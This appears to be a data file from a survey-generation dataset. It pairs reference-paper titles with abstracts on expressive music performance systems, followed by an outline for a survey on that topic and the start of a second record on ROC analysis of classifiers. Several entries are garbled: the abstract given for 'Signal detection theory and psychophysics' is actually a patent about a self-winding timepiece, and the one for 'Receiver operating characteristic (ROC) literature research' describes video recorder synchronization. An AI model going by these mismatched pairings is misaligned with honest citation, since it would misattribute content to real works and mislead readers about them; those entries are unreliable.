down. The theoretical constants Narmour uses are context-free and, therefore, applicable to all styles of melody. He places considerable emphasis on the listener's cognitive performance (that is, fundamental melodic perception as opposed to acquired musical competence). He concentrates almost exclusively on low-level, note-to-note relations. The result is a highly generalized theory useful in researching all manner of psychological and music-theoretic problems concerned with the analysis and cognition of melody. "In this innovative, landmark book, a distinguished music theorist draws extensively from a variety of disciplines, in particular from cognitive psychology and music theory, to develop an elegant and persuasive framework for the understanding of melody. This book should be read by all scholars with a serious interest in music."--Diana Deutsch, Editor, Music Perception --- paper_title: Saxex: A case-based reasoning system for generating expressive musical performances paper_content: Abstract The problem of generating expressive musical performances in the context of tenor saxophone interpretations was studied. Several recordings of a tenor sax playing different Jazz ballads with different degrees of expressiveness including an inexpressive interpretation of each ballad were made. These recordings were analyzed, using Sms spectral modeling techniques, to extract information related to several expressive parameters. This set of parameters and the scores constitute the set of cases (examples) of a case‐based system. 
From this set of cases, the system infers a set of possible expressive transformations for a given new phrase applying similarity criteria, based on background musical knowledge, between this new phrase and the set of cases. Finally, SaxEx applies the inferred expressive transformations to the new phrase using the synthesis capabilities of Sms. --- paper_title: A Case Based Approach to the Generation of Musical Expression paper_content: The majority of naturally sounding musical performance has musical expression (fluctuation in tempo, volume, etc.). Musical expression is affected by various factors, such as the performer, performative style, mood, and so forth. However, in past research on the computerized generation of musical expression, these factors are treated as being less significant, or almost ignored. Hence, the majority of past approaches find it relatively hard to generate multiple performance for a given piece of music with varying musical expression. ::: ::: In this paper, we propose a case-based approach to the generation of expressively modulated performance. This method enables the generation of varying musical expression for a single piece of music. We have implemented the proposed case-based method in a musical performance system, and, we also describe the system architecture and experiments performed on the system. --- paper_title: Machine Discoveries: A Few Simple, Robust Local Expression Principles paper_content: The paper presents a new approach to discovering general rules of expressive music performance from real performance data via inductive machine learning. A new learning algorithm is briefly presented, and then an experiment with a very large data set (performances of 13 Mozart piano sonatas) is described. The new learning algorithm succeeds in discovering some extremely simple and general principles of musical performance (at the level of individual notes), in the form of categorical prediction rules. These rules turn out to be very robust and general: when tested on performances by a different pianist and even on music of a different style (Chopin), they exhibit a surprisingly high degree of predictive accuracy. --- paper_title: Relational IBL in music with a new structural similarity measure paper_content: It is well known that many hard tasks considered in machine learning and data mining can be solved in an rather simple and robust way with an instance- and distance-based approach. In this paper we present another difficult task: learning, from large numbers of performances by concert pianists, to play music expressively. We model the problem as a multi-level decomposition and prediction task. Motivated by structural characteristics of such a task, we propose a new relational distance measure that is a rather straightforward combination of two existing measures. Empirical evaluation shows that our approach is in general viable and our algorithm, named DISTALL, is indeed able to produce musically interesting results. The experiments also provide evidence of the success of ILP in a complex domain such as music performance: it is shown that our instance-based learner operating on structured, relational data outperforms a propositional k-NN algorithm. --- paper_title: Can the Computer Learn to Play Music Expressively? paper_content: A computer system is described that provides a real-time musical accompaniment for a live soloist in a piece of non-improvised music. 
A Bayesian belief network is developed that represents the joint distribution on the times at which the solo and accompaniment notes are played as well as many hidden variables. The network models several important sources of information including the information contained in the score and the rhythmic interpretations of the soloist and accompaniment which are learned from examples. The network is used to provide a computationally efficient decision-making engine that utilizes all available information while producing a flexible and musical accompaniment. --- paper_title: A Bayesian Network for Real-Time Musical Accompaniment paper_content: We describe a computer system that provides a real-time musical accompaniment for a live soloist in a piece of non-improvised music for soloist and accompaniment. A Bayesian network is developed that represents the joint distribution on the times at which the solo and accompaniment notes are played, relating the two parts through a layer of hidden variables. The network is first constructed using the rhythmic information contained in the musical score. The network is then trained to capture the musical interpretations of the soloist and accompanist in an off-line rehearsal phase. During live accompaniment the learned distribution of the network is combined with a real-time analysis of the soloist's acoustic signal, performed with a hidden Markov model, to generate a musically principled accompaniment that respects all available sources of knowledge. A live demonstration will be provided. --- paper_title: The Performance Worm: Real Time Visualisation of Expression based on Langner's Tempo-Loudness Animation paper_content: In an expressive performance, a skilled musician shapes the music by continuously modulating aspects like tempo and loudness to communicate high level information such as musical structure and emotion. Although automatic modelling of this phenomenon remains beyond the current state of the art, we present a system that is able to measure tempo and dynamics of a musical performance and to track their development over time. The system accepts raw audio input, tracks tempo and dynamics changes in real time, and displays the development of these expressive parameters in an intuitive and aesthetically appealing graphical format which provides insight into the expressive patterns applied by skilled artists. --- paper_title: Towards Machine Learning of Expressive Microtiming in Brazilian Drumming paper_content: We have used supervised machine learning to apply microtiming to music specified only in terms of quantized note times for a variety of percussion instruments. The output of the regression schemes we tried is simply the microtiming deviation to apply to each note. In particular, we trained Locally Weighted Linear Regression / K-Nearest-Neighbors (LWLR/KNN), Kernel Ridge Regression (KRR), and Gaussian Process Regression (GPR) on data from skilled human performance of a variety of Brazilian rhythms. Although our results are still far from the dream of inputting an arbitrary score and having the result sound as if expert human performers played it in the appropriate musical style, we believe we are on the right track. Evaluating our results with cross-validation, we found that the three methods are quite comparable, and in all cases the mean squared error is substantially less than the mean squared microtiming of the original data.
Subjectively, our results are satisfactory; the applied microtiming captures some element of musical style and sounds much more expressive than the quantized input. --- paper_title: Gaussian processes for machine learning paper_content: We give a basic introduction to Gaussian Process regression models. We focus on understanding the role of the stochastic process and how it is used to define a distribution over functions. We present the simple equations for incorporating training data and examine how to learn the hyperparameters using the marginal likelihood. We explain the practical advantages of Gaussian Process and end with conclusions and a look at the current trends in GP work. --- paper_title: Nonlinear Component Analysis as a Kernel Eigenvalue Problem paper_content: A new method for performing a nonlinear form of principal component analysis is proposed. By the use of integral operator kernel functions, one can efficiently compute principal components in high-dimensional feature spaces, related to input space by some nonlinear map—for instance, the space of all possible five-pixel products in 16 × 16 images. We give the derivation of the method and present experimental results on polynomial feature extraction for pattern recognition. --- paper_title: The Nearest Neighbor Classification Rule with a Reject Option paper_content: An observation comes from one of two possible classes. If all the statistics of the problem are known, Bayes' classification scheme yields the minimum probability of error. If, instead, the statistics are not known and one is given only a labeled training set, it is known that the nearest neighbor rule has an asymptotic error no greater than twice that of Bayes' rule. Here the (k,k?) nearest neighbor rule with a reject option is examined. This rule looks at the k nearest neighbors and rejects if less than k? of these are from the same class; if k? or more are from one class, a decision is made in favor of that class. The error rate of such a rule is bounded in terms of the Bayes' error rate. --- paper_title: Evolving musical performance profiles using genetic algorithms with structural fitness paper_content: This paper presents a system that uses Genetic Algorithm (GA) to evolve hierarchical pulse sets (i.e., hierarchical duration vs. amplitude matrices) for expressive music performance by machines. The performance profile for a piece of music is represented using pulse sets and the fitness (for the GA) is derived from the structure of the piece to be performed; hence the term "structural fitness". Randomly initiated pulse sets are selected and evolved using GA. The fitness value is calculated by measuring the pulse set's ability of highlighting musical structures. This measurement is based upon generative rules for expressive music performance. This is the first stage of a project, which is aimed at the design of a dynamic model for the evolution of expressive performance profiles by interacting agents in an artificial society of musicians and listeners. --- paper_title: Inducing a generative expressive performance model using a sequential-covering genetic algorithm paper_content: In this paper, we describe an evolutionary approach to inducing a generative model of expressive music performance for Jazz saxophone. We begin with a collection of audio recordings of real Jazz saxophone performances from which we extract a symbolic representation of the musician's expressive performance. 
We then apply an evolutionary algorithm to the symbolic representation in order to obtain computational models for different aspects of expressive performance. Finally, we use these models to automatically synthesize performances with the expressiveness that characterizes the music generated by a professional saxophonist. --- paper_title: Composing Music by Composing Rules: Design and Usage of a Generic Music Constraint System paper_content: This research presents the design, usage, and evaluation of a highly generic music constraint system called Strasheela. Strasheela simplifies the definition of musical constraint satisfaction problems (CSP) by predefining building blocks required for such problems. At the same time, Strasheela preserves a high degree of generality and is reasonably efficient. Strasheela is highly generic, because it is highly programmable. In particular, three fundamental components are more programmable in Strasheela compared with existing music constraint systems: the music representation, the rule application mechanism, and the search process. Strasheela features an expressive symbolic music representation. This representation supports explicitly storing score information by sets of score objects, their attributes, and their hierarchic nesting. Any information available in the score is accessible from any object in the score and can be used to obtain derived information. The representation is complemented by the notion of variables: score information can be unknown and such information can be constrained. This research proposes a rule formalism which combines convenience and full user control to express which score variable sets are constrained by a given rule. A rule is a first-class function. A rule application mechanism is a higher-order function. A rule application mechanism traverses the score in order to apply a given rule to variable sets. This text presents rule application mechanisms suitable for a large set of musical CSPs and reproduces important mechanisms of existing systems. Strasheela is founded on a constraint programming model which makes the search process programmable at a high-level. The Strasheela user can optimise the search for a particular constraint satisfaction problem by programming a distribution strategy (a dynamic variable and value ordering) independent of the problem definition. Special distribution strategies for efficiently solving various musical CSPs – including complex polyphonic problems – are presented. --- paper_title: Autonomous Evolution of Complete Piano Pieces and Performances paper_content: Evolutionary algorithms are used to evolve musical score material and corresponding performance data, in an autonomous process. In this way complete piano compositions are created and subsequently performed on a computer-controlled grand piano. The efficiency of the creative evolution depends to a large extent on the representation used, which in this case is based on recursively described binary trees. They can represent a wide variety of musical material and corresponding performance data in a compact form, with an inherent potential for musically meaningful variations and archetypal musical gestures. This is combined with a set of automated formalized selection criteria based on experiences from human selection processes in a previous, interactive version of the same system, leading to surprisingly musical output and convincing performances. 
The system is also capable of rudimentary learning, through recycling of its own musical output, and an accumulated database of human musical input. --- paper_title: Data mining: practical machine learning tools and techniques with Java implementations paper_content: 1. What's It All About? 2. Input: Concepts, Instances, Attributes 3. Output: Knowledge Representation 4. Algorithms: The Basic Methods 5. Credibility: Evaluating What's Been Learned 6. Implementations: Real Machine Learning Schemes 7. Moving On: Engineering The Input And Output 8. Nuts And Bolts: Machine Learning Algorithms In Java 9. Looking Forward --- paper_title: The Local Boundary Detection Model (LBDM) and its application in the study of expressive timing paper_content: In this paper two main topics are addressed. Firstly, the Local Boundary Detection Model (LBDM) is described; this computational model enables the detection of local boundaries in a melodic surface and can be used for musical segmentation. The proposed model is tested against the punctuation rule system developed by Friberg et al. (1998) at KTH, Stockholm. Secondly, the expressive timing deviations found in a number of expert piano performances are examineded in relation to the local boundaries discovered by LBDM. As a result of a set of preliminary experiments, it is suggested that the assumption of final-note lengthening of a melodic gesture is not always valid and that, in some cases, the end of a melodic group is marked by lengthening the second-to-last note (or, seeing it from a different viewpoint, by delaying the last note). --- paper_title: Emergent Sound Repertoires in Virtual Societies paper_content: Computer Music Journal, 26:2, pp. 77–90, Summer 2002 2002 Massachusetts Institute of Technology. Computer simulations wherein musical forms may originate and evolve in artificially created worlds can be an effective way to study the origins and evolution of music. This article presents a simulation in which a society of distributed and autonomous but cooperative agents evolve sound repertoires from scratch by interacting with one another. We demonstrate by means of a concrete example the important role of mimetic interactions for music evolution in a virtual society. The article begins with a succinct commentary on the motivation for this research, its objectives, and the methodology for its realization. Then we state the objective of the particular simulation introduced in this article, followed by a detailed explanation of its design and functioning, along with a critical assessment of its results. --- paper_title: The Analysis and Cognition of Basic Melodic Structures: The Implication-Realization Model paper_content: Eugene Narmour formulates a comprehensive theory of melodic syntax to explain cognitive relations between melodic tones at their most basic level. Expanding on the theories of Leonard B. Meyer, the author develops one parsimonious, scaled set of rules modeling implication and realization in all the primary parameters of music. Through an elaborate and original analytic symbology, he shows that a kind of "genetic code" governs the perception and cognition of melody. One is an automatic, "brute" system operating on stylistic primitives from the bottom up. The other constitutes a learned system of schemata impinging on style structures from the top down. The theoretical constants Narmour uses are context-free and, therefore, applicable to all styles of melody. 
He places considerable emphasis on the listener's cognitive performance (that is, fundamental melodic perception as opposed to acquired musical competence). He concentrates almost exclusively on low-level, note-to-note relations. The result is a highly generalized theory useful in researching all manner of psychological and music-theoretic problems concerned with the analysis and cognition of melody. "In this innovative, landmark book, a distinguished music theorist draws extensively from a variety of disciplines, in particular from cognitive psychology and music theory, to develop an elegant and persuasive framework for the understanding of melody. This book should be read by all scholars with a serious interest in music."--Diana Deutsch, Editor, Music Perception --- paper_title: C4.5: Programs for Machine Learning paper_content: From the Publisher: Classifier systems play a major role in machine learning and knowledge-based systems, and Ross Quinlan's work on ID3 and C4.5 is widely acknowledged to have made some of the most significant contributions to their development. This book is a complete guide to the C4.5 system as implemented in C for the UNIX environment. It contains a comprehensive guide to the system's use, the source code (about 8,800 lines), and implementation notes. The source code and sample datasets are also available on a 3.5-inch floppy diskette for a Sun workstation. C4.5 starts with large sets of cases belonging to known classes. The cases, described by any mixture of nominal and numeric properties, are scrutinized for patterns that allow the classes to be reliably discriminated. These patterns are then expressed as models, in the form of decision trees or sets of if-then rules, that can be used to classify new cases, with emphasis on making the models understandable as well as accurate. The system has been applied successfully to tasks involving tens of thousands of cases described by hundreds of properties. The book starts from simple core learning methods and shows how they can be elaborated and extended to deal with typical problems such as missing data and overfitting. Advantages and disadvantages of the C4.5 approach are discussed and illustrated with several case studies. This book and software should be of interest to developers of classification-based intelligent systems and to students in machine learning and expert systems courses. --- paper_title: From RTM-notation to ENP-score-notation paper_content: This paper discusses some recent developments within a compositional environment called PWGL. Our focus is to present how score information is represented in PWGL. We give some background information concerning the rhythmic notation that was used in PatchWork (a predecessor of PWGL). After this we show how this notation has been expanded so that it allows the generation of very detailed scores that can contain, besides the basic rhythmic structures, other information such as grace-notes, instrumentation, pitch and expressions. --- paper_title: Neural correlates of social and nonsocial emotions: An fMRI study paper_content: Common theories of emotion emphasize valence and arousal dimensions or alternatively, specific emotions, and the search for the underlying neurocircuitry is underway. However, it is likely that other important dimensions for emotional neurocircuitry exist, and one of them is sociality.
A social dimension may code whether emotions are addressing an individual's biological/visceral need versus more remote social goals involving semantic meaning or intentionality. Thus, for practical purposes, social emotions may be distinguished from nonsocial emotions based in part on the presence of human forms. In the current fMRI study, we aimed to compare regional coding of the sociality dimension of emotion (nonsocial versus social) versus the valence dimension of emotion (positive versus negative). Using a novel fMRI paradigm, film and picture stimuli were combined to induce and maintain four emotions varying along social and valence dimensions. Nonsocial emotions of positively valenced appetite and negatively valenced disgust and social emotions of positively valenced joy/amusement and negatively valenced sadness were studied. All conditions activated the thalamus. Appetite and disgust activated posterior insula and visual cortex, whereas joy/amusement and sadness activated extended amygdala, superior temporal gyrus, hippocampus, and posterior cingulate. Activations within the anterior cingulate, nucleus accumbens, orbitofrontal cortex, and amygdala were modulated by both social and valence dimensions. Overall, these findings highlight that sociality has a key role in processing emotional valence, which may have implications for patient populations with social and emotional deficits. --- paper_title: Towards a neural basis of music perception paper_content: Music perception involves complex brain functions underlying acoustic analysis, auditory memory, auditory scene analysis, and processing of musical syntax and semantics. Moreover, music perception potentially affects emotion, influences the autonomic nervous system, the hormonal and immune systems, and activates (pre)motor representations. During the past few years, research activities on different aspects of music processing and their neural correlates have rapidly progressed. This article provides an overview of recent developments and a framework for the perceptual side of music processing. This framework lays out a model of the cognitive modules involved in music perception, and incorporates information about the time course of activity of some of these modules, as well as research findings about where in the brain these modules might be located. --- paper_title: ATTA: Automatic Time-Span Tree Analyzer Based on Extended GTTM paper_content: This paper describes a music analyzing system called the automatic time-span tree analyzer (ATTA), which we have developed. The ATTA derives a time-span tree that assigns a hierarchy of 'structural importance' to the notes of a piece of music based on the generative theory of tonal music (GTTM). Although the time-span tree has been applied with music summarization and collaborative music creation systems, these systems use time-span trees manually analyzed by experts in musicology. Previous systems based on GTTM cannot acquire a timespan tree without manual application of most of the rules, because GTTM does not resolve much of the ambiguity that exists with the application of the rules. To solve this problem, we propose a novel computational model of the GTTM that re-formalizes the rules with computer implementation. The main advantage of our approach is that we can introduce adjustable parameters, which enables us to assign priority to the rules. 
Our analyzer automatically acquires time-span trees by configuring the parameters that cover 26 rules out of 36 GTTM rules for constructing a time-span tree. Experimental results showed that after these parameters were tuned, our method outperformed a baseline performance. We hope to distribute the time-span tree as the content for various musical tasks, such as searching and arranging music. ---
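Several of the references above (the Local Boundary Detection Model and the ATTA analyzer with its adjustable rule parameters) rest on the same basic move: scoring candidate grouping boundaries as a tunable weighted combination of local cues. A minimal, hypothetical sketch of that move, with invented weights and cue definitions rather than the published rule sets, might look as follows.

```python
# Hedged sketch (not the ATTA or LBDM implementations): grouping-boundary strength
# computed as an adjustable weighted sum of simple local cues, in the spirit of
# tunable preference-rule parameters. Weights and cue definitions are assumptions.

notes = [
    # (onset_time_in_beats, MIDI pitch) for a short monophonic fragment
    (0.0, 60), (0.5, 62), (1.0, 64), (2.5, 72), (3.0, 71), (3.5, 69),
]

WEIGHTS = {"ioi": 0.6, "pitch": 0.4}  # tunable, analogous to adjustable rule parameters

def boundary_strengths(notes, weights):
    """Return a (note_index, strength) pair for the gap before each note i >= 1."""
    strengths = []
    for i in range(1, len(notes)):
        ioi = notes[i][0] - notes[i - 1][0]          # inter-onset interval
        leap = abs(notes[i][1] - notes[i - 1][1])    # pitch interval in semitones
        score = weights["ioi"] * ioi + weights["pitch"] * leap / 12.0
        strengths.append((i, round(score, 3)))
    return strengths

# The gap with the largest score is the most plausible group boundary,
# here the long gap and large leap before the fourth note.
print(max(boundary_strengths(notes, WEIGHTS), key=lambda s: s[1]))
```

Retuning the weights shifts which cues dominate, which is exactly the kind of parameter adjustment the rule-based analyzers above expose.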
Title: A Survey of Computer Systems for Expressive Music Performance
Section 1: INTRODUCTION
Description 1: This section introduces the history, motivation, and objectives behind computer systems for expressive music performance.
Section 2: Human Expressive Performance
Description 2: This section describes how humans perform music expressively and the various performance actions involved.
Section 3: Computer Expressive Performance
Description 3: This section outlines the motivations and applications for developing computer systems that can perform music expressively.
Section 4: A GENERIC FRAMEWORK FOR PREVIOUS RESEARCH IN COMPUTER EXPRESSIVE PERFORMANCE
Description 4: This section provides a generic model for the framework that most previous research into automated and semiautomated CSEMPs has followed.
Section 5: Primary Terms of Reference for Systems Reviewed
Description 5: This section introduces the primary terms of reference used to evaluate the systems reviewed in the survey.
Section 6: Modules of Systems Reviewed
Description 6: This section outlines the different modules that make up the systems reviewed, such as performance knowledge, music/analysis, performance context, adaptation process, performance examples, and instrument model.
Section 7: A SURVEY OF COMPUTER SYSTEMS FOR EXPRESSIVE MUSIC PERFORMANCE
Description 7: This section provides an overview and classification of various automated and semiautomated CSEMP systems, grouped by their learning method.
Section 8: Director Musices
Description 8: This section describes the Director Musices system, its rules, parameters, and its evaluation.
Section 9: Hierarchical Parabola Model
Description 9: This section discusses the Hierarchical Parabola Model and its application in generating expressive performances.
Section 10: Composer Pulse and Predictive Amplitude Shaping
Description 10: This section explains Manfred Clynes' Composer Pulse and predictive amplitude shaping techniques for expressive music performance.
Section 11: Bach Fugue System
Description 11: This section details the Bach Fugue System and its methods for generating expressive performance actions.
Section 12: Trumpet Synthesis
Description 12: This section examines a system for synthesizing expressive trumpet performances and its effectiveness.
Section 13: Rubato
Description 13: This section discusses the Rubato system, its mathematical theory, and its performance creativity.
Section 14: Pop-E
Description 14: This section describes the Pop-E system, its synchronization algorithms, and its evaluations.
Section 15: Hermode Tuning
Description 15: This section introduces the Hermode Tuning system for expressive intonation.
Section 16: Sibelius
Description 16: This section covers the expressive performance algorithms built into the Sibelius music typesetting software.
Section 17: Computational Music Emotion Rule System
Description 17: This section details the Computational Music Emotion Rule System, its rules, and its effectiveness in expressing emotions in music.
Section 18: Linear Regression
Description 18: This section discusses CSEMPs that use linear regression models to learn expressive performance actions.
Section 19: Artificial Neural Network Piano System
Description 19: This section outlines the Artificial Neural Network Piano System and its methods of learning expressive performance from human performances.
Section 20: Emotional Flute
Description 20: This section examines the Emotional Flute system, its neural networks, and its performance evaluation.
Section 21: SaxEx
Description 21: This section describes the SaxEx system and its use of case-based reasoning for generating expressive saxophone performances.
Section 22: Kagurame
Description 22: This section details the Kagurame system for expressive piano performance, its hierarchical approach, and evaluations.
Section 23: Ha-Hi-Hun
Description 23: This section discusses the Ha-Hi-Hun system, its use of GTTM TSR, and its performance evaluations.
Section 24: PLCG System
Description 24: This section outlines the PLCG system, its data mining approach, and its rule generation process.
Section 25: Combined Phrase-Decomposition/PLCG
Description 25: This section introduces the Combined Phrase-Decomposition/PLCG system, its hierarchical learning method, and evaluations.
Section 26: DISTALL System
Description 26: This section describes the DISTALL system, its hierarchical case learning, and its performance results.
Section 27: Music Plus One
Description 27: This section examines the Music Plus One system, its real-time capabilities, and its use for polyphonic accompaniment.
Section 28: ESP Piano System
Description 28: This section details the ESP Piano system, its learning methods, and performance evaluations.
Section 29: Other Regression Methods
Description 29: This section discusses CSEMPs that use other regression methods, such as Kernel Ridge Regression and Gaussian Process Regression.
Section 30: Evolutionary Computation
Description 30: This section examines CSEMPs that use evolutionary computation methods for generating expressive performances.
Section 31: Genetic Programming Jazz Sax
Description 31: This section outlines a genetic programming approach for generating expressive jazz saxophone performances.
Section 32: Sequential Covering Algorithm GAs
Description 32: This section discusses the use of genetic algorithms combined with sequential covering algorithms for learning expressive performance actions.
Section 33: Generative Performance GAs
Description 33: This section introduces a generative performance system using genetic algorithms to evolve pulse sets.
Section 34: Multi-Agent System with Imitation
Description 34: This section describes the Multi-Agent System with Imitation and its approach to generating expressive performances through agent interaction.
Section 35: Ossia
Description 35: This section outlines the Ossia system, its recursive tree representation, and its capabilities for combined composition and performance generation.
Section 36: pMIMACS
Description 36: This section introduces the pMIMACS system, its multi-agent approach, and its method for combining composition with expressive performance.
Section 37: SUMMARY
Description 37: This section summarizes the key findings of the survey, discusses the primary terms of reference, and highlights trends in CSEMP research.
Section 38: CONCLUSIONS
Description 38: This section offers concluding remarks on the achievements and future directions for research in computer systems for expressive music performance.
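Section 6 of the outline names the modules a generic CSEMP is assumed to contain. Purely as an illustrative scaffold (the class and all defaults below are hypothetical; only the module names are taken from the outline's wording), those modules could be collected as:

```python
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, List

# Hypothetical scaffold mirroring the generic CSEMP framework modules named in
# Section 6 of the outline above; not an implementation taken from the survey.
@dataclass
class GenericCSEMP:
    performance_knowledge: Dict[str, Any] = field(default_factory=dict)  # rules or learned models
    music_analysis: Callable[[Any], Any] = lambda score: score           # structural analysis of the score
    performance_context: Dict[str, Any] = field(default_factory=dict)    # e.g. intended mood or style
    performance_examples: List[Any] = field(default_factory=list)        # human performances to learn from
    instrument_model: str = "MIDI piano"                                 # how performance actions are rendered

    def adaptation_process(self) -> None:
        """Placeholder for updating performance_knowledge from performance_examples."""
        pass

    def render(self, score: Any) -> Any:
        """Placeholder pipeline: analyse the score, then apply performance knowledge."""
        analysis = self.music_analysis(score)
        return analysis  # a real system would map analysis plus knowledge to expressive actions
```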
ROC Analysis of Classifiers in Machine Learning: A Survey
7
--- paper_title: Receiver Operating Characteristic Curves and Their Use in Radiology paper_content: Sensitivity and specificity are the basic measures of accuracy of a diagnostic test; however, they depend on the cut point used to define “positive” and “negative” test results. As the cut point shifts, sensitivity and specificity shift. The receiver operating characteristic (ROC) curve is a plot of the sensitivity of a test versus its false-positive rate for all possible cut points. The advantages of the ROC curve as a means of defining the accuracy of a test, construction of the ROC, and identification of the optimal cut point on the ROC curve are discussed. Several summary measures of the accuracy of a test, including the commonly used percentage of correct diagnoses and area under the ROC curve, are described and compared. Two examples of ROC curve application in radiologic research are presented. © RSNA, 2003 --- paper_title: Epidemiologic methods. Studying the occurrence of illness paper_content: Edited by Thomas D Koepsell, Noel S Weiss. Oxford: Oxford University Press, 2003, £39.95, pp 513. ISBN 0-19-515078-3 ::: ::: Several books introducing epidemiology are available. They usually follow the traditional layout: from initial definitions to the description and control of biases and measurement errors and it becomes challenging to offer something “different”. ::: ::: Epidemiological Methods , by Koepsell and Weiss succeeds in presenting epidemiology in a … --- paper_title: Signal detection theory and psychophysics paper_content: 418,865. Time-pieces. HARWOOD, J., 120, Pinner Road, Harrow, Middlesex. Oct. 23, 1933, No. 29295. [Class 139.] Winding-apparatus.-In a time-piece, which is self-wound by an oscillating weight, the weight oscillates in or parallel to a vertical plane through the axis of the indicating hands and is combined with a toothless winding mechanism. Rigid with the winding arbor A of the mainspring A is a disc B, the edge of which coacts with two studs G, G and a lever I on a trefoil plate E. Lever I is connected by link O to an arm 0 rigid with the weight W which oscillates about pivot R against spring X. When the link O is raised, the nose of lever I binds on the edge of disc B and the latter is moved counter-clockwise, Fig. 2, with plate E to wind the mainspring. A similar trefoil plate D with pins F, F and lever H prevents retrograde movement of disc B in a clockwise direction. V, V are buffer springs. To prevent overwinding the link O may be made in two relatively sliding parts which are joined together by an S-spring slightly weaker than the fully wound mainspring. A mark on the weight may be visible through a hole in the dial to indicate whether the weight is oscillating freely. The movement of the timepiece, or the timepiece as a whole, may be mounted for oscillation so as to function as the winding weight. --- paper_title: Signal detection theory: valuable tools for evaluating inductive learning paper_content: This paper describes the use of signal detection theory as a tool for evaluating and comparing concept descriptions learned by inductive inference. We outline the use of ROC curves and describe the experience we have had in using these concepts for inductive learning using connectionist models, genetic search, and symbolic concept acquisition. --- paper_title: Measuring the accuracy of diagnostic systems paper_content: Diagnostic systems of several kinds are used to distinguish between two classes of events, essentially "signals" and "noise". 
For them, analysis in terms of the "relative operating characteristic" of signal detection theory provides a precise and valid measure of diagnostic accuracy. It is the only measure available that is uninfluenced by decision biases and prior probabilities, and it places the performances of diverse systems on a common, easily interpreted scale. Representative values of this measure are reported here for systems in medical imaging, materials testing, weather forecasting, information retrieval, polygraph lie detection, and aptitude testing. Though the measure itself is sound, the values obtained from tests of diagnostic systems often require qualification because the test data on which they are based are of unsure quality. A common set of problems in testing is faced in all fields. How well these problems are handled, or can be handled in a given field, determines the degree of confidence that can be placed in a measured value of accuracy. Some fields fare much better than others. --- paper_title: Receiver operating characteristic (ROC) literature research paper_content: There is disclosed a technique for use in a recorder-reproducer system to provide synchronization between video information playback of the system and a local video information source. In the arrangement provided, a synchronizing signal which is produced from a first control track signal of the system, is phase compared with a reference signal from the local source. The first control track signal is one which can have one of many phase relationships with respect to the reference signal, only one of which is the desired one. A second signal from the control track and a signal extracted from the video signal are recovered from the record medium. Both of these signals can provide information as to the desired phase relation between the synchronizing signal and the reference signal. Means are provided for examining the recovered signals, for selecting the one that best defines at that time the desired phase relationship and for utilizing that signal to control the production of the synchronizing signal. --- paper_title: Repairing Concavities in ROC Curves paper_content: In this paper we investigate methods to detect and repair concavities in ROC curves by manipulating model predictions. The basic idea is that, if a point or a set of points lies below the line spanned by two other points in ROC space, we can use this information to repair the concavity. This effectively builds a hybrid model combining the two better models with an inversion of the poorer models; in the case of ranking classifiers, it means that certain intervals of the scores are identified as unreliable and candidates for inversion. We report very encouraging results on 23 UCI data sets, particularly for naive Bayes where the use of two validation folds yielded significant improvements on more than half of them, with only one loss. --- paper_title: Comparing classifiers when the misallocation costs are uncertain paper_content: Receiver Operating Characteristic (ROC) curves are popular ways of summarising the performance of two class classification rules. In fact, however, they are extremely inconvenient. If the relative severity of the two different kinds of misclassification is known, then an awkward projection operation is required to deduce the overall loss. At the other extreme, when the relative severity is unknown, the area under an ROC curve is often used as an index of performance. 
However, this essentially assumes that nothing whatsoever is known about the relative severity – a situation which is very rare in real problems. We present an alternative plot which is more revealing than an ROC plot and we describe a comparative index which allows one to take advantage of anything that may be known about the relative severity of the two kinds of misclassification. --- paper_title: The meaning and use of the area under a receiver operating characteristic (ROC) curve. paper_content: A representation and interpretation of the area under a receiver operating characteristic (ROC) curve obtained by the "rating" method, or by mathematical predictions based on patient characteristics, is presented. It is shown that in such a setting the area represents the probability that a randomly chosen diseased subject is (correctly) rated or ranked with greater suspicion than a randomly chosen non-diseased subject. Moreover, this probability of a correct ranking is the same quantity that is estimated by the already well-studied nonparametric Wilcoxon statistic. These two relationships are exploited to (a) provide rapid closed-form expressions for the approximate magnitude of the sampling variability, i.e., standard error that one uses to accompany the area under a smoothed ROC curve, (b) guide in determining the size of the sample required to provide a sufficiently reliable estimate of this area, and (c) determine how large sample sizes should be to ensure that one can statistically detect difference... --- paper_title: Generating ROC curves for artificial neural networks paper_content: Receiver operating characteristic (ROC) analysis is an established method of measuring diagnostic performance in medical imaging studies. An ROC curve characterizes the inherent tradeoff between true positive and false positive detection rates in a classification system. Traditionally, artificial neural networks (ANNs) have been applied as a classifier to find one "best" partition of feature space, and therefore a single detection rate. This work proposes and evaluates a new technique for generating an ROC curve for a 2-class ANN classifier. We show that the new technique generates significantly better ROC curves than the method currently used to generate ROCs for ANNs. > --- paper_title: A ROC-based reject rule for support vector machines paper_content: This paper presents a novel reject rule for SVM classifiers, based on the Receiver Operating Characteristic curve. The rule minimizes the expected classification cost, defined on the basis of classification and error costs peculiar for the application at hand. Experiments performed with different kernels on several data sets publicly available confirmed the effectiveness of the proposed reject rule. --- paper_title: An improved measure for comparing diagnostic tests paper_content: We present a loss based method for comparing the predictive performance of diagnostic tests. Unlike standard assessment mechanisms, like the area under the receiver-operating characteristic curve and the misclassification rate, our method takes specific advantage of any information that can be obtained about misclassification costs. We argue that not taking costs into account can lead to incorrect conclusions, and illustrate with two examples. --- paper_title: The Geometry of ROC Space: Understanding Machine Learning Metrics through ROC Isometrics paper_content: Many different metrics are used in machine learning and data mining to build and evaluate models. 
However, there is no general theory of machine learning metrics, that could answer questions such as: When we simultaneously want to optimise two criteria, how can or should they be traded off? Some metrics are inherently independent of class and misclassification cost distributions, while other are not -- can this be made more precise? This paper provides a derivation of ROC space from first principles through 3D ROC space and the skew ratio, and redefines metrics in these dimensions. The paper demonstrates that the graphical depiction of machine learning metrics by means of ROC isometrics gives many useful insights into the characteristics of these metrics, and provides a foundation on which a theory of machine learning metrics can be built. --- paper_title: A Response to Webb and Ting’s On the Application of ROC Analysis to Predict Classification Performance Under Varying Class Distributions paper_content: In an article in this issue, Webb and Ting criticize ROC analysis for its inability to handle certain changes in class distributions. They imply that the ability of ROC graphs to depict performance in the face of changing class distributions has been overstated. In this editorial response, we describe two general types of domains and argue that Webb and Ting's concerns apply primarily to only one of them. Furthermore, we show that there are interesting real-world domains of the second type, in which ROC analysis may be expected to hold in the face of changing class distributions. --- paper_title: On the Application of ROC Analysis to Predict Classification Performance Under Varying Class Distributions paper_content: We counsel caution in the application of ROC analysis for prediction of classifier performance under varying class distributions. We argue that it is not reasonable to expect ROC analysis to provide accurate prediction of model performance under varying distributions if the classes contain causally relevant subclasses whose frequencies may vary at different rates or if there are attributes upon which the classes are causally dependent. --- 